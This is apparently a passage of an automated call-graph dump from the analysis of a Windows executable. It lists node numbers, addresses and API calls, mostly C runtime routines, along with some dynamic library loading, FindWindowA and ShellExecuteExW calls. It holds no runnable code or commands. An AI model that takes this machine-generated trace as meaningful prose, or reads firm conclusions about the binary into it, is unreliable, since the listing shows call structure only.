69 API calls 5570->5571 5571->5567 5574 401d40 5572->5574 5573->5561 5575 401d74 5574->5575 5576 401d48 5574->5576 5578 40159b __getptd_noexit 69 API calls 5575->5578 5597 4045df 5576->5597 5579 401d65 5578->5579 5623 401d90 5579->5623 5580 401d53 5580->5579 5610 40159b 5580->5610 5583 401d5f 5584 401b5b __cftof_l 69 API calls 5583->5584 5584->5579 5586 403c28 __FF_MSGBANNER 69 API calls 5585->5586 5587 40368d 5586->5587 5588 403a88 __NMSG_WRITE 69 API calls 5587->5588 5589 403696 5588->5589 5590 40304b __decode_pointer 5 API calls 5589->5590 5591 401dbe 5590->5591 5591->5545 5594 403516 5592->5594 5595 40354d 5594->5595 5596 40352e Sleep 5594->5596 5626 405918 5594->5626 5595->5566 5596->5594 5598 4045eb _doexit 5597->5598 5599 40304b __decode_pointer 5 API calls 5598->5599 5600 4045fb 5599->5600 5601 403731 ___crtMessageBoxA 67 API calls 5600->5601 5609 40464f _doexit 5600->5609 5602 40460b 5601->5602 5603 40461a 5602->5603 5604 402ebf __invoke_watson 10 API calls 5602->5604 5605 404623 GetModuleHandleA 5603->5605 5606 404644 5603->5606 5604->5603 5605->5606 5607 404632 GetProcAddress 5605->5607 5608 402fdf __encode_pointer 5 API calls 5606->5608 5607->5606 5608->5609 5609->5580 5611 4015a7 _doexit 5610->5611 5612 4015e6 5611->5612 5613 401620 _doexit _realloc 5611->5613 5615 401d99 __lock 67 API calls 5611->5615 5612->5613 5614 4015fb HeapFree 5612->5614 5613->5583 5614->5613 5616 40160d 5614->5616 5619 4015be ___sbh_find_block 5615->5619 5617 401b5b __cftof_l 67 API calls 5616->5617 5618 401612 GetLastError 5617->5618 5618->5613 5620 4015d8 5619->5620 5645 401e3d 5619->5645 5652 4015f1 5620->5652 5660 401cc1 LeaveCriticalSection 5623->5660 5625 401d97 5625->5567 5627 4059c5 5626->5627 5634 405926 5626->5634 5628 405fa5 _malloc 5 API calls 5627->5628 5630 4059cb 5628->5630 5629 40593b 5631 403c28 __FF_MSGBANNER 68 API calls 5629->5631 5629->5634 5636 403a88 __NMSG_WRITE 68 API calls 5629->5636 5638 4036d2 _malloc 3 API calls 5629->5638 5632 401b5b __cftof_l 68 API calls 5630->5632 5631->5629 5633 4059d1 5632->5633 5633->5594 5634->5629 5635 4058c9 _malloc 68 API calls 5634->5635 5637 405989 RtlAllocateHeap 5634->5637 5639 4059b0 5634->5639 5641 405fa5 _malloc 5 API calls 5634->5641 5642 4059ae 5634->5642 5644 4059bc 5634->5644 5635->5634 5636->5629 5637->5634 5638->5629 5640 401b5b __cftof_l 68 API calls 5639->5640 5640->5642 5641->5634 5643 401b5b __cftof_l 68 API calls 5642->5643 5643->5644 5644->5594 5646 401e7a 5645->5646 5651 40211c 5645->5651 5647 402066 VirtualFree 5646->5647 5646->5651 5648 4020ca 5647->5648 5649 4020d9 VirtualFree HeapFree 5648->5649 5648->5651 5655 4046b0 5649->5655 5651->5620 5659 401cc1 LeaveCriticalSection 5652->5659 5654 4015f8 5654->5612 5656 4046c8 5655->5656 5657 4046ef __VEC_memcpy 5656->5657 5658 4046f7 5656->5658 5657->5658 5658->5651 5659->5654 5660->5625 5662 402164 HeapReAlloc 5661->5662 5663 402198 HeapAlloc 5661->5663 5664 402186 5662->5664 5667 402182 5662->5667 5665 4021bb VirtualAlloc 5663->5665 5663->5667 5664->5663 5666 4021d5 HeapFree 5665->5666 5665->5667 5666->5667 5667->5551 5669 402216 VirtualAlloc 5668->5669 5671 40225d 5669->5671 5671->5555 5672->5558 5688 4030b7 TlsGetValue 5673->5688 5676 4031f5 5677 403249 SetLastError 5676->5677 5693 403552 5676->5693 5677->5411 5680 40304b __decode_pointer 5 API calls 5681 403221 5680->5681 5682 403240 5681->5682 5683 403228 5681->5683 5684 40159b __getptd_noexit 65 API calls 5682->5684 5699 40311e 5683->5699 5686 403246 5684->5686 5686->5677 5687 403230 GetCurrentThreadId 5687->5677 5689 4030e0 TlsGetValue 5688->5689 5690 4030c7 5688->5690 5689->5676 5691 40304b __decode_pointer 5 API calls 5690->5691 5692 4030d2 TlsSetValue 5691->5692 5692->5689 5696 403556 5693->5696 5695 403207 5695->5677 5695->5680 5696->5695 5697 403576 Sleep 5696->5697 5710 4059db 5696->5710 5698 40358b 5697->5698 5698->5695 5698->5696 5727 4028cc 5699->5727 5701 40312a GetModuleHandleA 5702 403170 InterlockedIncrement 5701->5702 5703 40314c GetProcAddress GetProcAddress 5701->5703 5704 401d99 __lock 65 API calls 5702->5704 5703->5702 5705 403197 5704->5705 5728 404ff2 InterlockedIncrement 5705->5728 5707 4031b6 5740 4031c9 5707->5740 5709 4031c3 _doexit 5709->5687 5711 4059e7 _doexit 5710->5711 5712 405a1e _memset 5711->5712 5713 4059ff 5711->5713 5716 405a14 _doexit 5712->5716 5718 405a90 RtlAllocateHeap 5712->5718 5719 405fa5 _malloc 5 API calls 5712->5719 5720 401d99 __lock 68 API calls 5712->5720 5721 4025e6 ___sbh_alloc_block 5 API calls 5712->5721 5723 405ad7 5712->5723 5714 401b5b __cftof_l 68 API calls 5713->5714 5715 405a04 5714->5715 5717 402fbb __cftof_l 5 API calls 5715->5717 5716->5696 5717->5716 5718->5712 5719->5712 5720->5712 5721->5712 5726 401cc1 LeaveCriticalSection 5723->5726 5725 405ade 5725->5712 5726->5725 5727->5701 5729 405010 5728->5729 5730 40500d InterlockedIncrement 5728->5730 5731 40501a InterlockedIncrement 5729->5731 5732 40501d 5729->5732 5730->5729 5731->5732 5733 405027 InterlockedIncrement 5732->5733 5734 40502a 5732->5734 5733->5734 5735 405034 InterlockedIncrement 5734->5735 5737 405037 5734->5737 5735->5737 5736 40504c InterlockedIncrement 5736->5737 5737->5736 5738 40505c InterlockedIncrement 5737->5738 5739 405065 InterlockedIncrement 5737->5739 5738->5737 5739->5707 5743 401cc1 LeaveCriticalSection 5740->5743 5742 4031d0 5742->5709 5743->5742 7005 407c99 7010 408920 GetModuleHandleA 7005->7010 7008 407caf 7011 40892f GetProcAddress 7010->7011 7012 407c9e 7010->7012 7011->7012 7012->7008 7013 4088bb 7012->7013 7018 408ddf 7013->7018 7015 4088ce 7016 4088df 7015->7016 7017 402ebf __invoke_watson 10 API calls 7015->7017 7016->7008 7017->7016 7019 408df8 __control87 7018->7019 7020 408e21 __control87 7018->7020 7021 401b5b __cftof_l 69 API calls 7019->7021 7020->7015 7022 408e12 7021->7022 7023 402fbb __cftof_l 5 API calls 7022->7023 7023->7020 7024 40889a 7027 408814 7024->7027 7026 4088b6 7028 40887e 7027->7028 7029 40881f 7027->7029 7085 408111 7028->7085 7029->7028 7030 408824 7029->7030 7032 408829 7030->7032 7036 408842 7030->7036 7041 408663 7032->7041 7033 408863 7033->7026 7035 408865 7072 4081fd 7035->7072 7036->7035 7038 40884c 7036->7038 7055 40871c 7038->7055 7099 408c51 7041->7099 7044 40869b 7045 401b5b __cftof_l 69 API calls 7044->7045 7047 4086a0 7045->7047 7046 4086ba 7109 408ad9 7046->7109 7048 402fbb __cftof_l 5 API calls 7047->7048 7054 4086ac 7048->7054 7051 40158c __cftof_l 5 API calls 7053 40871a 7051->7053 7053->7026 7054->7051 7056 408c51 __fltout2 69 API calls 7055->7056 7057 40874b 7056->7057 7058 408754 7057->7058 7060 408776 7057->7060 7059 401b5b __cftof_l 69 API calls 7058->7059 7061 408759 7059->7061 7063 408ad9 __fptostr 69 API calls 7060->7063 7062 402fbb __cftof_l 5 API calls 7061->7062 7070 408765 7062->7070 7067 4087a2 7063->7067 7064 40158c __cftof_l 5 API calls 7065 408812 7064->7065 7065->7033 7066 4087e9 7153 407fa4 7066->7153 7067->7066 7069 4087c1 7067->7069 7067->7070 7071 40856e __cftof2_l 79 API calls 7069->7071 7070->7064 7071->7070 7073 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7072->7073 7074 408220 7073->7074 7075 40822f 7074->7075 7076 40825f 7074->7076 7077 401b5b __cftof_l 69 API calls 7075->7077 7078 40826d 7076->7078 7082 408276 7076->7082 7079 408234 7077->7079 7080 401b5b __cftof_l 69 API calls 7078->7080 7081 402fbb __cftof_l 5 API calls 7079->7081 7080->7079 7084 408243 _memset __alldvrm __cftoa_l _strrchr 7081->7084 7082->7084 7172 4081df 7082->7172 7084->7033 7086 408c51 __fltout2 69 API calls 7085->7086 7087 408140 7086->7087 7088 408149 7087->7088 7090 408168 7087->7090 7089 401b5b __cftof_l 69 API calls 7088->7089 7091 40814e 7089->7091 7093 408ad9 __fptostr 69 API calls 7090->7093 7092 402fbb __cftof_l 5 API calls 7091->7092 7094 40815a 7092->7094 7095 4081ac 7093->7095 7096 40158c __cftof_l 5 API calls 7094->7096 7095->7094 7097 407fa4 __cftoe2_l 79 API calls 7095->7097 7098 4081dd 7096->7098 7097->7094 7098->7033 7100 408c7a ___dtold 7099->7100 7135 409f91 7100->7135 7103 405fc7 _strcpy_s 69 API calls 7104 408cb5 7103->7104 7105 408cc8 7104->7105 7107 402ebf __invoke_watson 10 API calls 7104->7107 7106 40158c __cftof_l 5 API calls 7105->7106 7108 408692 7106->7108 7107->7105 7108->7044 7108->7046 7110 408b0c 7109->7110 7111 408aee 7109->7111 7110->7111 7112 408b11 7110->7112 7113 401b5b __cftof_l 69 API calls 7111->7113 7115 408b26 7112->7115 7119 408b34 _strlen 7112->7119 7114 408af3 7113->7114 7116 402fbb __cftof_l 5 API calls 7114->7116 7117 401b5b __cftof_l 69 API calls 7115->7117 7118 4086ed 7116->7118 7117->7114 7118->7054 7121 40856e 7118->7121 7119->7118 7120 4046b0 __cftoe2_l __VEC_memcpy 7119->7120 7120->7118 7122 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7121->7122 7123 40858a 7122->7123 7124 40858e 7123->7124 7125 4085c1 7123->7125 7126 401b5b __cftof_l 69 API calls 7124->7126 7129 4085fd 7125->7129 7149 407f6b 7125->7149 7127 408593 7126->7127 7128 402fbb __cftof_l 5 API calls 7127->7128 7134 4085a4 _memset 7128->7134 7131 407f6b __shift __VEC_memcpy 7129->7131 7129->7134 7132 408612 7131->7132 7133 407f6b __shift __VEC_memcpy 7132->7133 7132->7134 7133->7134 7134->7054 7139 40a005 7135->7139 7136 40a06d 7140 405fc7 _strcpy_s 69 API calls 7136->7140 7137 40158c __cftof_l 5 API calls 7138 408c95 7137->7138 7138->7103 7139->7136 7141 40a085 7139->7141 7148 40a022 7139->7148 7142 40a0d0 7140->7142 7143 405fc7 _strcpy_s 69 API calls 7141->7143 7144 402ebf __invoke_watson 10 API calls 7142->7144 7142->7148 7145 40a0a4 7143->7145 7144->7148 7146 402ebf __invoke_watson 10 API calls 7145->7146 7145->7148 7146->7148 7147 40a831 7148->7137 7148->7147 7150 407f72 _strlen 7149->7150 7151 407f83 7149->7151 7152 4046b0 __cftoe2_l __VEC_memcpy 7150->7152 7151->7129 7152->7151 7154 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7153->7154 7155 407fba 7154->7155 7156 407fc0 7155->7156 7157 407ff0 7155->7157 7158 401b5b __cftof_l 69 API calls 7156->7158 7160 408004 7157->7160 7161 40800d 7157->7161 7159 407fc5 7158->7159 7162 402fbb __cftof_l 5 API calls 7159->7162 7163 401b5b __cftof_l 69 API calls 7160->7163 7164 408031 7161->7164 7166 407f6b __shift __VEC_memcpy 7161->7166 7165 407fd4 7162->7165 7163->7159 7167 405fc7 _strcpy_s 69 API calls 7164->7167 7165->7070 7166->7164 7168 408088 7167->7168 7169 402ebf __invoke_watson 10 API calls 7168->7169 7170 40809b 7168->7170 7169->7170 7170->7165 7171 4046b0 __cftoe2_l __VEC_memcpy 7170->7171 7171->7165 7173 408111 __cftoe_l 79 API calls 7172->7173 7174 4081f8 7173->7174 7174->7084 6699 407d5c 6700 407d95 6699->6700 6703 407d6b 6699->6703 6701 407daa __CxxUnhandledExceptionFilter 6700->6701 6702 40304b __decode_pointer 5 API calls 6700->6702 6702->6701 6703->6700 6705 405d33 6703->6705 6706 405d3f _doexit 6705->6706 6707 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 6706->6707 6710 405d44 6707->6710 6708 406f1e _abort 95 API calls 6709 405d66 _doexit 6708->6709 6709->6700 6710->6708 6850 4017dc 6853 4017ce 6850->6853 6852 4017e4 ctype 6856 403990 6853->6856 6855 4017da 6855->6852 6857 40399c _doexit 6856->6857 6858 401d99 __lock 69 API calls 6857->6858 6861 4039a3 6858->6861 6859 4039dc 6866 4039f7 6859->6866 6861->6859 6862 4039d3 6861->6862 6865 40159b __getptd_noexit 69 API calls 6861->6865 6864 40159b __getptd_noexit 69 API calls 6862->6864 6863 4039ed _doexit 6863->6855 6864->6859 6865->6862 6869 401cc1 LeaveCriticalSection 6866->6869 6868 4039fe 6868->6863 6869->6868 5744 40185d 5787 4028cc 5744->5787 5746 401869 GetProcessHeap HeapAlloc 5747 401886 5746->5747 5748 401898 GetVersionExA 5746->5748 5932 4017f8 5747->5932 5750 4018b3 GetProcessHeap HeapFree 5748->5750 5751 4018a8 GetProcessHeap HeapFree 5748->5751 5752 4018df 5750->5752 5786 40188d _doexit 5751->5786 5788 401bc9 HeapCreate 5752->5788 5754 40191e 5755 40192a 5754->5755 5756 4017f8 _fast_error_exit 69 API calls 5754->5756 5798 40338e GetModuleHandleA 5755->5798 5756->5755 5758 401930 5759 40193b __RTC_Initialize 5758->5759 5760 4017f8 _fast_error_exit 69 API calls 5758->5760 5831 4042a1 5759->5831 5760->5759 5762 40194a 5763 401955 5762->5763 5764 403688 __amsg_exit 69 API calls 5762->5764 5848 404202 5763->5848 5764->5763 5771 40197a 5894 403dd0 5771->5894 5773 403688 __amsg_exit 69 API calls 5773->5771 5775 40198b 5907 4037a4 5775->5907 5776 403688 __amsg_exit 69 API calls 5776->5775 5778 401993 5779 40199e 5778->5779 5780 403688 __amsg_exit 69 API calls 5778->5780 5916 40bc10 FindWindowA 5779->5916 5780->5779 5783 4019cd 5940 403926 5783->5940 5787->5746 5789 401be9 5788->5789 5790 401bec 5788->5790 5789->5754 5943 401b6e 5790->5943 5793 401bfb 5952 401dca HeapAlloc 5793->5952 5794 401c1f 5794->5754 5797 401c0a HeapDestroy 5797->5789 5799 4033a0 5798->5799 5800 4033a9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5798->5800 5954 4030e1 5799->5954 5802 4033f3 TlsAlloc 5800->5802 5805 403441 TlsSetValue 5802->5805 5806 40350d 5802->5806 5805->5806 5807 403452 5805->5807 5806->5758 5960 403944 5807->5960 5810 402fdf __encode_pointer 5 API calls 5811 403462 5810->5811 5812 402fdf __encode_pointer 5 API calls 5811->5812 5813 403472 5812->5813 5814 402fdf __encode_pointer 5 API calls 5813->5814 5815 403482 5814->5815 5816 402fdf __encode_pointer 5 API calls 5815->5816 5817 403492 5816->5817 5967 401c23 5817->5967 5820 403508 5822 4030e1 __mtterm 6 API calls 5820->5822 5821 40304b __decode_pointer 5 API calls 5823 4034b3 5821->5823 5822->5806 5823->5820 5824 403552 __calloc_crt 69 API calls 5823->5824 5825 4034cc 5824->5825 5825->5820 5826 40304b __decode_pointer 5 API calls 5825->5826 5827 4034e6 5826->5827 5827->5820 5828 4034ed 5827->5828 5829 40311e __initptd 69 API calls 5828->5829 5830 4034f5 GetCurrentThreadId 5829->5830 5830->5806 5974 4028cc 5831->5974 5833 4042ad GetStartupInfoA 5834 403552 __calloc_crt 69 API calls 5833->5834 5836 4042ce 5834->5836 5835 4044d8 _doexit 5835->5762 5836->5835 5837 40441f 5836->5837 5840 403552 __calloc_crt 69 API calls 5836->5840 5842 4043a2 5836->5842 5838 404455 GetStdHandle 5837->5838 5839 4044ba SetHandleCount 5837->5839 5841 404467 GetFileType 5837->5841 5847 40447e 5837->5847 5838->5837 5839->5835 5840->5836 5841->5837 5842->5837 5843 4043d6 5842->5843 5844 4043cb GetFileType 5842->5844 5843->5835 5843->5842 5846 4045df ___crtInitCritSecAndSpinCount 69 API calls 5843->5846 5844->5842 5844->5843 5845 4045df ___crtInitCritSecAndSpinCount 69 API calls 5845->5847 5846->5843 5847->5835 5847->5837 5847->5845 5849 404242 5848->5849 5850 404215 GetCommandLineW 5848->5850 5851 404247 GetCommandLineW 5849->5851 5855 404232 5849->5855 5852 404227 GetLastError 5850->5852 5853 40421b 5850->5853 5862 40195b 5851->5862 5852->5855 5852->5862 5853->5851 5854 404250 GetCommandLineA MultiByteToWideChar 5856 404270 5854->5856 5854->5862 5855->5854 5855->5862 5857 403552 __calloc_crt 69 API calls 5856->5857 5858 404278 5857->5858 5859 404280 MultiByteToWideChar 5858->5859 5858->5862 5860 404293 5859->5860 5859->5862 5861 40159b __getptd_noexit 69 API calls 5860->5861 5861->5862 5863 4040a1 5862->5863 5864 4040d8 5863->5864 5865 4040b9 GetEnvironmentStringsW 5863->5865 5866 4040c1 5864->5866 5868 404140 5864->5868 5865->5866 5867 4040cd GetLastError 5865->5867 5870 4040f0 GetEnvironmentStringsW 5866->5870 5871 4040ff 5866->5871 5867->5864 5869 404149 GetEnvironmentStrings 5868->5869 5872 401965 5868->5872 5869->5872 5881 404157 _strlen 5869->5881 5870->5871 5870->5872 5874 403512 __malloc_crt 69 API calls 5871->5874 5888 403ff6 GetModuleFileNameW 5872->5888 5878 404120 _realloc 5874->5878 5875 404181 5877 403552 __calloc_crt 69 API calls 5875->5877 5876 40415e MultiByteToWideChar 5876->5872 5876->5881 5879 40418e _strlen ___crtGetEnvironmentStringsW 5877->5879 5880 404127 FreeEnvironmentStringsW 5878->5880 5882 404196 FreeEnvironmentStringsA 5879->5882 5883 4041e6 FreeEnvironmentStringsA 5879->5883 5884 4041ac MultiByteToWideChar 5879->5884 5880->5872 5881->5875 5881->5876 5882->5872 5883->5872 5884->5879 5885 4041f9 5884->5885 5886 40159b __getptd_noexit 69 API calls 5885->5886 5887 4041ff 5886->5887 5887->5882 5889 404028 _wparse_cmdline 5888->5889 5890 40196f 5889->5890 5891 404065 5889->5891 5890->5771 5890->5773 5892 403512 __malloc_crt 69 API calls 5891->5892 5893 40406b _wparse_cmdline 5892->5893 5893->5890 5895 403de9 ___crtGetEnvironmentStringsW 5894->5895 5897 401980 5894->5897 5896 403552 __calloc_crt 69 API calls 5895->5896 5898 403e0d ___crtGetEnvironmentStringsW 5896->5898 5897->5775 5897->5776 5898->5897 5899 403e6f 5898->5899 5901 403552 __calloc_crt 69 API calls 5898->5901 5902 403e94 5898->5902 5905 403e57 5898->5905 5975 4063c3 5898->5975 5900 40159b __getptd_noexit 69 API calls 5899->5900 5900->5897 5901->5898 5903 40159b __getptd_noexit 69 API calls 5902->5903 5903->5897 5905->5898 5906 402ebf __invoke_watson 10 API calls 5905->5906 5906->5905 5908 4037ad __cinit 5907->5908 5984 405d14 5908->5984 5910 4037cc __initterm_e 5913 40380d __cinit 5910->5913 5988 4017bc 5910->5988 5912 4037ed 5912->5913 5915 4017bc 76 API calls 5912->5915 5991 40bce0 5912->5991 5913->5778 5915->5912 6095 40b170 5916->6095 5918 40bc5e _wcsstr 5921 40bcbf 5918->5921 6099 40b230 5918->6099 5920 40bc8a 6102 40af60 LoadLibraryA GetProcAddress 5920->6102 6107 40ba50 5921->6107 5925 40bcbb 5927 40158c __cftof_l 5 API calls 5925->5927 5928 4019bb 5927->5928 5928->5783 5929 403904 5928->5929 6270 403836 5929->6270 5931 403911 5931->5783 5933 401801 5932->5933 5934 401806 5932->5934 5935 403c28 __FF_MSGBANNER 69 API calls 5933->5935 5936 403a88 __NMSG_WRITE 69 API calls 5934->5936 5935->5934 5937 40180f 5936->5937 5938 4036d2 _malloc 3 API calls 5937->5938 5939 401819 5938->5939 5939->5786 5941 403836 _doexit 69 API calls 5940->5941 5942 403931 5941->5942 5942->5786 5944 403731 ___crtMessageBoxA 69 API calls 5943->5944 5945 401b85 5944->5945 5946 401b94 5945->5946 5948 402ebf __invoke_watson 10 API calls 5945->5948 5947 403768 ___crtMessageBoxA 69 API calls 5946->5947 5949 401ba0 5947->5949 5948->5946 5950 402ebf __invoke_watson 10 API calls 5949->5950 5951 401baf 5949->5951 5950->5951 5951->5793 5951->5794 5953 401c05 5952->5953 5953->5794 5953->5797 5955 4030eb 5954->5955 5959 4030f7 5954->5959 5956 40304b __decode_pointer 5 API calls 5955->5956 5956->5959 5957 403119 5957->5957 5958 40310b TlsFree 5958->5957 5959->5957 5959->5958 5961 403042 ___crtMessageBoxA 5 API calls 5960->5961 5962 40394a __init_pointers 5961->5962 5971 405d6c 5962->5971 5965 402fdf __encode_pointer 5 API calls 5966 403457 5965->5966 5966->5810 5968 401c2c 5967->5968 5969 401c5a 5968->5969 5970 4045df ___crtInitCritSecAndSpinCount 69 API calls 5968->5970 5969->5820 5969->5821 5970->5968 5972 402fdf __encode_pointer 5 API calls 5971->5972 5973 40397c 5972->5973 5973->5965 5974->5833 5976 4063d0 5975->5976 5977 4063d8 5975->5977 5976->5977 5982 406400 5976->5982 5978 401b5b __cftof_l 69 API calls 5977->5978 5979 4063dd 5978->5979 5980 402fbb __cftof_l 5 API calls 5979->5980 5981 4063ec 5980->5981 5981->5898 5982->5981 5983 401b5b __cftof_l 69 API calls 5982->5983 5983->5979 5985 405d18 5984->5985 5986 402fdf __encode_pointer 5 API calls 5985->5986 5987 405d30 5985->5987 5986->5985 5987->5910 5994 401780 5988->5994 5990 4017c5 5990->5912 6092 40b130 LoadLibraryA 5991->6092 5995 40178c _doexit 5994->5995 6002 4036e7 5995->6002 6001 4017ad _doexit 6001->5990 6003 401d99 __lock 69 API calls 6002->6003 6004 401791 6003->6004 6005 4016a4 6004->6005 6006 40304b __decode_pointer 5 API calls 6005->6006 6007 4016b4 6006->6007 6008 40304b __decode_pointer 5 API calls 6007->6008 6009 4016c5 6008->6009 6010 40173f 6009->6010 6026 4035e5 6009->6026 6023 4017b6 6010->6023 6012 4016df 6014 401707 6012->6014 6015 4016f7 6012->6015 6022 40172a 6012->6022 6013 402fdf __encode_pointer 5 API calls 6013->6010 6014->6010 6016 401701 6014->6016 6039 40359a 6015->6039 6016->6014 6018 40359a __realloc_crt 75 API calls 6016->6018 6020 40171e 6016->6020 6019 401718 6018->6019 6019->6010 6019->6020 6021 402fdf __encode_pointer 5 API calls 6020->6021 6021->6022 6022->6013 6088 4036f0 6023->6088 6027 4035f1 _doexit 6026->6027 6028 403601 6027->6028 6029 40361e 6027->6029 6030 401b5b __cftof_l 69 API calls 6028->6030 6031 40365f HeapSize 6029->6031 6033 401d99 __lock 69 API calls 6029->6033 6032 403606 6030->6032 6035 403616 _doexit 6031->6035 6034 402fbb __cftof_l 5 API calls 6032->6034 6036 40362e ___sbh_find_block 6033->6036 6034->6035 6035->6012 6044 40367f 6036->6044 6043 40359e 6039->6043 6041 4035e0 6041->6016 6042 4035c1 Sleep 6042->6043 6043->6041 6043->6042 6048 405af9 6043->6048 6047 401cc1 LeaveCriticalSection 6044->6047 6046 40365a 6046->6031 6046->6035 6047->6046 6049 405b05 _doexit 6048->6049 6050 405b1a 6049->6050 6051 405b0c 6049->6051 6053 405b21 6050->6053 6054 405b2d 6050->6054 6052 405918 _malloc 69 API calls 6051->6052 6069 405b14 _doexit _realloc 6052->6069 6055 40159b __getptd_noexit 69 API calls 6053->6055 6061 405c9f 6054->6061 6081 405b3a ___sbh_resize_block _realloc ___sbh_find_block 6054->6081 6055->6069 6056 405cd2 6057 405fa5 _malloc 5 API calls 6056->6057 6060 405cd8 6057->6060 6058 401d99 __lock 69 API calls 6058->6081 6059 405ca4 HeapReAlloc 6059->6061 6059->6069 6062 401b5b __cftof_l 69 API calls 6060->6062 6061->6056 6061->6059 6063 405cf6 6061->6063 6064 405fa5 _malloc 5 API calls 6061->6064 6067 405cec 6061->6067 6062->6069 6065 401b5b __cftof_l 69 API calls 6063->6065 6063->6069 6064->6061 6068 405cff GetLastError 6065->6068 6070 401b5b __cftof_l 69 API calls 6067->6070 6068->6069 6069->6043 6072 405c6d 6070->6072 6071 405bc5 HeapAlloc 6071->6081 6072->6069 6074 405c72 GetLastError 6072->6074 6073 405c1a HeapReAlloc 6073->6081 6074->6069 6075 4025e6 ___sbh_alloc_block 5 API calls 6075->6081 6076 405c85 6076->6069 6078 401b5b __cftof_l 69 API calls 6076->6078 6077 405fa5 _malloc 5 API calls 6077->6081 6079 405c92 6078->6079 6079->6068 6079->6069 6080 405c68 6082 401b5b __cftof_l 69 API calls 6080->6082 6081->6056 6081->6058 6081->6069 6081->6071 6081->6073 6081->6075 6081->6076 6081->6077 6081->6080 6083 401e3d VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6081->6083 6084 405c3d 6081->6084 6082->6072 6083->6081 6087 401cc1 LeaveCriticalSection 6084->6087 6086 405c44 6086->6081 6087->6086 6091 401cc1 LeaveCriticalSection 6088->6091 6090 4017bb 6090->6001 6091->6090 6093 40158c __cftof_l 5 API calls 6092->6093 6094 40b16c GetProcAddress 6093->6094 6094->5912 6121 40b0e0 LoadLibraryA 6095->6121 6098 40b1a7 6098->5918 6124 40b090 LoadLibraryA 6099->6124 6103 402ad0 _memset 6102->6103 6104 40afbd ShellExecuteExW 6103->6104 6105 40158c __cftof_l 5 API calls 6104->6105 6106 40aff9 6105->6106 6106->5921 6106->5925 6127 40b250 6107->6127 6109 40bb79 6110 40b130 6 API calls 6109->6110 6111 40bba4 GetProcAddress 6110->6111 6112 40bbb9 6111->6112 6114 40bbd0 6112->6114 6130 40b270 6112->6130 6115 40b270 92 API calls 6114->6115 6116 40bbe4 6114->6116 6115->6114 6157 40b730 6116->6157 6119 40158c __cftof_l 5 API calls 6120 40bbfe 6119->6120 6120->5925 6122 40158c __cftof_l 5 API calls 6121->6122 6123 40b120 GetProcAddress 6122->6123 6123->6098 6125 40158c __cftof_l 5 API calls 6124->6125 6126 40b0d8 GetProcAddress 6125->6126 6126->5920 6128 40b0e0 6 API calls 6127->6128 6129 40b25d GetProcAddress 6128->6129 6129->6109 6177 4011b0 6130->6177 6132 40b2c0 6133 40158c __cftof_l 5 API calls 6132->6133 6134 40b728 6133->6134 6134->6112 6135 40b29f 6135->6132 6183 401440 VariantInit 6135->6183 6138 40b403 SafeArrayGetDim 6139 40b705 6138->6139 6141 40b41a SafeArrayGetLBound SafeArrayGetUBound SafeArrayAccessData 6138->6141 6195 4013a0 VariantClear 6139->6195 6142 40b4a5 GetEnvironmentVariableW 6141->6142 6144 40b4f7 lstrcatW lstrcatW 6142->6144 6145 40b529 6142->6145 6144->6145 6146 40b250 7 API calls 6145->6146 6147 40b52e 6146->6147 6148 40b5d2 6147->6148 6149 40b53e wsprintfW 6147->6149 6150 40b090 6 API calls 6148->6150 6149->6148 6151 40b633 GetProcAddress 6150->6151 6152 40b090 6 API calls 6151->6152 6153 40b649 GetProcAddress 6152->6153 6189 40b1b0 6153->6189 6155 40b6fb SafeArrayUnaccessData 6155->6139 6156 40b662 6156->6155 6160 40b74a 6157->6160 6158 40158c __cftof_l 5 API calls 6159 40ba40 6158->6159 6159->6119 6176 40b76b 6160->6176 6219 401270 6160->6219 6163 401270 74 API calls 6164 40b899 6163->6164 6225 401160 6164->6225 6168 40b93e 6233 4012e0 6168->6233 6172 40b9ef 6237 4012c0 SysFreeString 6172->6237 6174 40b9f7 6238 4012c0 SysFreeString 6174->6238 6176->6158 6178 4011c1 SysFreeString 6177->6178 6179 4011fb 6177->6179 6178->6179 6180 4011d3 SysAllocString 6178->6180 6179->6135 6181 4011ea 6180->6181 6181->6179 6196 401120 6181->6196 6184 401465 6183->6184 6185 401480 6184->6185 6201 407a70 6184->6201 6205 4013e0 6185->6205 6188 40148e 6188->6138 6188->6139 6190 40b090 6 API calls 6189->6190 6191 40b1f9 GetProcAddress 6190->6191 6192 40b21c 6191->6192 6193 40158c __cftof_l 5 API calls 6192->6193 6194 40b226 6193->6194 6194->6156 6195->6132 6197 401135 6196->6197 6200 401100 RaiseException 6197->6200 6199 401152 6199->6179 6200->6199 6202 407aca 6201->6202 6203 407a80 6201->6203 6202->6185 6203->6202 6204 407aba GetErrorInfo 6203->6204 6204->6202 6206 401412 6205->6206 6207 4013ef VariantInit VariantCopy 6205->6207 6210 401629 6206->6210 6209 40140d 6207->6209 6209->6188 6213 401637 _realloc 6210->6213 6214 40163b _memset 6210->6214 6211 401640 6212 401b5b __cftof_l 69 API calls 6211->6212 6215 401645 6212->6215 6213->6209 6214->6211 6214->6213 6217 40168a 6214->6217 6216 402fbb __cftof_l 5 API calls 6215->6216 6216->6213 6217->6213 6218 401b5b __cftof_l 69 API calls 6217->6218 6218->6215 6220 4012a9 6219->6220 6221 40127d 6219->6221 6220->6163 6239 401030 6221->6239 6223 401288 6223->6220 6224 401120 RaiseException 6223->6224 6224->6220 6226 401178 SysAllocString 6225->6226 6227 40116d 6225->6227 6228 40118f 6226->6228 6230 401300 6227->6230 6228->6227 6229 401120 RaiseException 6228->6229 6229->6227 6257 401330 6230->6257 6269 4013a0 VariantClear 6233->6269 6235 4012ef 6236 4012c0 SysFreeString 6235->6236 6236->6172 6237->6174 6238->6176 6240 40103c _Error_objects 6239->6240 6249 401042 6239->6249 6241 401059 MultiByteToWideChar 6240->6241 6240->6249 6242 401090 SysAllocStringLen 6241->6242 6243 401087 6241->6243 6244 4010a5 MultiByteToWideChar 6242->6244 6245 4010ea 6242->6245 6243->6242 6244->6245 6246 4010cc SysFreeString 6244->6246 6247 4014c0 69 API calls 6245->6247 6250 4014c0 6246->6250 6247->6249 6249->6223 6253 4014c9 6250->6253 6251 4014f3 6251->6249 6253->6251 6254 401000 6253->6254 6255 40159b __getptd_noexit 69 API calls 6254->6255 6256 40100c 6255->6256 6256->6253 6264 4013a0 VariantClear 6257->6264 6259 401341 6265 401210 6259->6265 6261 40131b 